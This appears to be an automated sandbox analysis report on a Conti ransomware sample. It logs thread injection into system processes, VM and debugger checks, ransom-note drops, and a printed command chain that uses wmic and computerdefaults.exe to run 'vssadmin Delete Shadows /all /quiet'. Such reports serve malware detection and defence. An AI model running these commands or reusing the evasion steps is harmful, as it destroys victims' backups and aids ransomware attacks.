Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_00007FF6AB572880 push rbp; iretd 2_2_00007FF6AB572881
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_00007FF6AB573AFE pushfq ; ret 2_2_00007FF6AB573AFF
Source: initial sample Static PE information: section name: .text entropy: 7.62659115899

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\ComputerDefaults.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\ComputerDefaults.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\ComputerDefaults.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe File created: C:\Users\Public\readme.txt
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Desktop\GAOBCVIQIJ\readme.txt
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Desktop\IPKGELNTQY\readme.txt
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Desktop\LSBIHQFDVT\readme.txt
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Desktop\NEBFQQYWPS\readme.txt
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Desktop\readme.txt
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Documents\GAOBCVIQIJ\readme.txt
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Documents\IPKGELNTQY\readme.txt
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Documents\LSBIHQFDVT\readme.txt
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Documents\NEBFQQYWPS\readme.txt
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Documents\readme.txt
Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Downloads\readme.txt
Source: C:\Windows\System32\sihost.exe File created: C:\Users\Public\readme.txt
Source: C:\Windows\System32\svchost.exe File created: C:\Users\Public\readme.txt
Source: C:\Windows\System32\svchost.exe File created: C:\Users\Public\readme.txt
Source: C:\Windows\System32\taskhostw.exe File created: C:\Users\Public\readme.txt

Malware Analysis System Evasion:

Contains capabilities to detect virtual machines
Source: C:\Windows\System32\ComputerDefaults.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_00007FF6AB572327 rdtsc 2_2_00007FF6AB572327
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_000001BB058206B2 FindFirstFileExW, 2_2_000001BB058206B2
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_000001BB058906B2 GlobalAlloc,FindFirstFileExW, 2_2_000001BB058906B2
Source: C:\Windows\System32\sihost.exe Code function: 3_2_0000024D2C4106B2 FindFirstFileExW, 3_2_0000024D2C4106B2
Source: C:\Windows\System32\svchost.exe Code function: 4_2_0000024843FF06B2 FindFirstFileExW, 4_2_0000024843FF06B2
Source: C:\Windows\System32\svchost.exe Code function: 11_2_0000020A025A06B2 FindFirstFileExW, 11_2_0000020A025A06B2
Source: C:\Windows\System32\taskhostw.exe Code function: 30_2_00000255F9EB06B2 FindFirstFileExW, 30_2_00000255F9EB06B2
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_000001BB0582016A CreateMutexW,GetVolumeInformationW,GetLogicalDriveStringsW, 2_2_000001BB0582016A
Source: sihost.exe, 00000003.00000000.230762461.0000024D2EE30000.00000002.00000001.sdmp, WMIC.exe, 00000009.00000002.243253123.00000232C7520000.00000002.00000001.sdmp, WMIC.exe, 0000000A.00000002.247040845.0000025ED6CC0000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.497265670.0000020A02B40000.00000002.00000001.sdmp, WMIC.exe, 00000015.00000002.248951683.0000020D0FA10000.00000002.00000001.sdmp, WMIC.exe, 00000017.00000002.250850741.000001909DD20000.00000002.00000001.sdmp, WMIC.exe, 0000001C.00000002.266576402.0000026D07D60000.00000002.00000001.sdmp, WMIC.exe, 0000001F.00000002.271124084.000002599F830000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: taskhostw.exe, 0000001E.00000000.249503673.00000255F5824000.00000004.00000001.sdmp Binary or memory string: 1&dispvertres=1024&isu=0&lo=663559&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=663559&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
Source: ComputerDefaults.exe, 00000021.00000002.266558256.000001E991F33000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}\8
Source: taskhostw.exe, 0000001E.00000002.494889453.00000255F5824000.00000004.00000001.sdmp Binary or memory string: /Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:EE4890C5-90AE-59E2-5AC5-C20AA6654592&ctry=US&time=20200930T152422Z&lc=en-US&pl=en-US&idtp=mid&uid=d9fcfe42-b5d5-4629-ac66-c2605ea824c4&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=b89e401591fe4b0d8cb7204159ee5a88&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=663559&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=663559&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
Source: sihost.exe, 00000003.00000000.230762461.0000024D2EE30000.00000002.00000001.sdmp, WMIC.exe, 00000009.00000002.243253123.00000232C7520000.00000002.00000001.sdmp, WMIC.exe, 0000000A.00000002.247040845.0000025ED6CC0000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.497265670.0000020A02B40000.00000002.00000001.sdmp, WMIC.exe, 00000015.00000002.248951683.0000020D0FA10000.00000002.00000001.sdmp, WMIC.exe, 00000017.00000002.250850741.000001909DD20000.00000002.00000001.sdmp, WMIC.exe, 0000001C.00000002.266576402.0000026D07D60000.00000002.00000001.sdmp, WMIC.exe, 0000001F.00000002.271124084.000002599F830000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: sihost.exe, 00000003.00000000.230762461.0000024D2EE30000.00000002.00000001.sdmp, WMIC.exe, 00000009.00000002.243253123.00000232C7520000.00000002.00000001.sdmp, WMIC.exe, 0000000A.00000002.247040845.0000025ED6CC0000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.497265670.0000020A02B40000.00000002.00000001.sdmp, WMIC.exe, 00000015.00000002.248951683.0000020D0FA10000.00000002.00000001.sdmp, WMIC.exe, 00000017.00000002.250850741.000001909DD20000.00000002.00000001.sdmp, WMIC.exe, 0000001C.00000002.266576402.0000026D07D60000.00000002.00000001.sdmp, WMIC.exe, 0000001F.00000002.271124084.000002599F830000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: taskhostw.exe, 0000001E.00000002.494889453.00000255F5824000.00000004.00000001.sdmp Binary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:EE4890C5-90AE-59E2-5AC5-C20AA6654592&ctry=US&time=20200930T152422Z&lc=en-US&pl=en-US&idtp=mid&uid=d9fcfe42-b5d5-4629-ac66-c2605ea824c4&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=b89e401591fe4b0d8cb7204159ee5a88&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=663559&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=663559&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
Source: svchost.exe, 00000004.00000000.235490138.0000024844060000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: sihost.exe, 00000003.00000000.230762461.0000024D2EE30000.00000002.00000001.sdmp, WMIC.exe, 00000009.00000002.243253123.00000232C7520000.00000002.00000001.sdmp, WMIC.exe, 0000000A.00000002.247040845.0000025ED6CC0000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.497265670.0000020A02B40000.00000002.00000001.sdmp, WMIC.exe, 00000015.00000002.248951683.0000020D0FA10000.00000002.00000001.sdmp, WMIC.exe, 00000017.00000002.250850741.000001909DD20000.00000002.00000001.sdmp, WMIC.exe, 0000001C.00000002.266576402.0000026D07D60000.00000002.00000001.sdmp, WMIC.exe, 0000001F.00000002.271124084.000002599F830000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_00007FF6AB572327 rdtsc 2_2_00007FF6AB572327

HIPS / PFW / Operating System Protection Evasion:

Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread created: C:\Windows\System32\sihost.exe EIP: 0
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread created: C:\Windows\System32\svchost.exe EIP: 0
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread created: C:\Windows\System32\svchost.exe EIP: 0
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread created: C:\Windows\System32\taskhostw.exe EIP: 0
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread created: unknown EIP: 0
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread created: unknown EIP: 0
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread created: unknown EIP: 0
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread created: unknown EIP: 0
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread created: unknown EIP: 0
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread created: unknown EIP: 0
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread created: unknown EIP: 0
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread created: unknown EIP: 0
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread created: unknown EIP: 0
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread created: unknown EIP: 0
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread created: unknown EIP: 0
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread created: unknown EIP: 0
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread created: unknown EIP: 0
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Section loaded: unknown target: C:\Windows\System32\sihost.exe protection: execute and read and write
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Section loaded: unknown target: C:\Windows\System32\svchost.exe protection: execute and read and write
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Section loaded: unknown target: C:\Windows\System32\svchost.exe protection: execute and read and write
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Section loaded: unknown target: C:\Windows\System32\taskhostw.exe protection: execute and read and write
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Section loaded: unknown target: unknown protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 2952
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 2996
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 3020
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 2736
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 3176
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 3292
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 3528
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 3088
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 3756
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 3688
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 4396
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 4484
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 3200
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 5588
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 5648
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 5796
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: target process: 6076
Sets debug register (to hijack the execution of another thread)
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Thread register set: 2952 1BB026C0AB0
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
Source: C:\Windows\System32\ComputerDefaults.exe Process created: C:\Windows\System32\wbem\WMIC.exe 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet'
Source: C:\Windows\System32\ComputerDefaults.exe Process created: C:\Windows\System32\wbem\WMIC.exe 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
Source: C:\Windows\System32\ComputerDefaults.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\ComputerDefaults.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: sihost.exe, 00000003.00000000.230128911.0000024D2C9E0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.495300769.0000024844590000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000000.239825029.0000020A01190000.00000002.00000001.sdmp, taskhostw.exe, 0000001E.00000000.254789754.00000255F5E30000.00000002.00000001.sdmp Binary or memory string: uProgram Manager
Source: sihost.exe, 00000003.00000000.230128911.0000024D2C9E0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.495300769.0000024844590000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000000.239825029.0000020A01190000.00000002.00000001.sdmp, taskhostw.exe, 0000001E.00000000.254789754.00000255F5E30000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: sihost.exe, 00000003.00000000.230128911.0000024D2C9E0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.495300769.0000024844590000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000000.239825029.0000020A01190000.00000002.00000001.sdmp, taskhostw.exe, 0000001E.00000000.254789754.00000255F5E30000.00000002.00000001.sdmp Binary or memory string: Progman
Source: sihost.exe, 00000003.00000000.230128911.0000024D2C9E0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.495300769.0000024844590000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000000.239825029.0000020A01190000.00000002.00000001.sdmp, taskhostw.exe, 0000001E.00000000.254789754.00000255F5E30000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\sihost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\taskhostw.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\sihost.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Behavior Graph:

Behavior Graph ID: 419877
Sample: 7906dc47_by_Libranalysis
Startdate: 21/05/2021
Architecture: WINDOWS
Score: 100

Process tree (reconstructed from the behavior graph; "started" marks a child process, "injected" marks an existing process that received injected code):

  • Sample start. Signatures: Multi AV Scanner detection for submitted file; Found ransom note / readme; Yara detected Conti ransomware; 6 other signatures
    • 7906dc47_by_Libranalysis.exe (started). Signatures: Sets debug register (to hijack the execution of another thread); Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Creates a thread in another existing process (thread injection)
      • sihost.exe (injected). Dropped: C:\Users\user\Desktop\...\SUAVTZKNFL.pdf (data); C:\Users\user\Desktop\LSBIHQFDVT.docx (data); C:\Users\user\Desktop\...\GAOBCVIQIJ.docx (data); 2 other files (none is malicious). Signature: Modifies existing user documents (likely ransomware behavior)
        • cmd.exe (started)
          • WMIC.exe (started). Signature: Creates processes via WMI
          • conhost.exe (started)
        • cmd.exe (started)
          • 2 other processes
      • taskhostw.exe (injected). Dropped: C:\Users\Public\readme.txt (ASCII)
      • svchost.exe (injected)
        • cmd.exe (started)
          • 2 other processes
        • cmd.exe (started)
          • 2 other processes
      • svchost.exe (injected)
        • cmd.exe (started)
          • conhost.exe (started)
        • cmd.exe (started)
          • conhost.exe (started)
    • cmd.exe (started)
      • ComputerDefaults.exe (started). Signature: Creates processes via WMI
        • WMIC.exe (started)
          • conhost.exe (started)
      • conhost.exe (started)
    • cmd.exe (started)
      • ComputerDefaults.exe (started)
        • WMIC.exe (started)
          • conhost.exe (started)
      • conhost.exe (started)
    • 2 other processes
      • 4 other processes
No contacted IP infos